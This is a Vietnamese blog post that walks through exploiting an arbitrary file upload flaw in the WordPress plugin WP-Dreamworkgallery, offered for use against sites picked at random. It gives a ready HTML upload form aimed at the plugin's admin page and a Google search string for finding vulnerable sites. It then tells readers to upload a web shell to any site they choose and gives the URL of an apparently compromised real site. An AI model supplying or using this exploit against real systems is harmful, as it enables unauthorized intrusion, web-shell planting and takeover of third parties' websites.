:))
:((
:D
:(
:)
:-)
;)
=))
:p
=.=
==
^_^
/=he
:*
/=r
/=l
:v
/=ok
/=clap
(y)
(yy)
/=hi
/=j
/=hup
/=hd
/=hl
/=hr
/=s
<3

Hướng dẫn bình luận

Chèn link

Sử dụng thẻ TÊN_HIỂN_THỊ

Chèn hình ảnh

[img] LINK_ANH [/img] - sử dụng công cụ bên dưới để upload ảnh.

Định dạng chữ

Chữ in đậm
Chữ in nghiêng
Chữ gạch chân
Chữ gạch ngang

Chèn một đoạn Code

Đầu tiên sử dụng công cụ này để mã hóa đoạn code muốn chèn.
Sau đó dùng thẻ [code] CODE_ĐÃ_MÃ_HÓA [/code]

Đã hiểu

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

0 Bình luận 18:32
Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery
Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery
Lỗi này cho phép chúng ta UpShell lên một cách thoải mái thông qua một file .html ngay từ localhost

Bước 1: Tạo 1 file Upload.html

<html><body><form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"><input type="hidden" name="task" value="drm_add_new_album" /><input type="hidden" name="album_name" value="Arbitrary File Upload" /><input type="hidden" name="album_desc" value="Arbitrary File Upload" /><input type="file" name="album_img" value="" /><input type="submit" value="Submit" /></form></body></html> 

Bước 2: Tìm Web bị lỗi

Tìm lỗi bằng cách vào Google.com gõ lệnh
inurl:/wp-content/plugins/wp-dreamworkgallery/ 

Bước 3: Chọn 1 site bất kỳ

Thay link trang Web bị lỗi vào code ở Bước 1, nhớ Save lại nhé

Bước 4: Up Shell

Mở File Upload.html ở Bước 1 lên, và Up Shell lên
Lưu ý: Đoạn lỗi sau khi Up shell
Copy dòng này vào Link site bị lỗi là OK
http://www.presprint.rs/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html

Bài viết liên quan:

Không có nhận xét nào:

Đăng nhận xét

  • Blog bạn bè:
  • Blog sẻ chia thủ thuật |
  • Thuc Lê Blogger |
  • Tự Học Excel |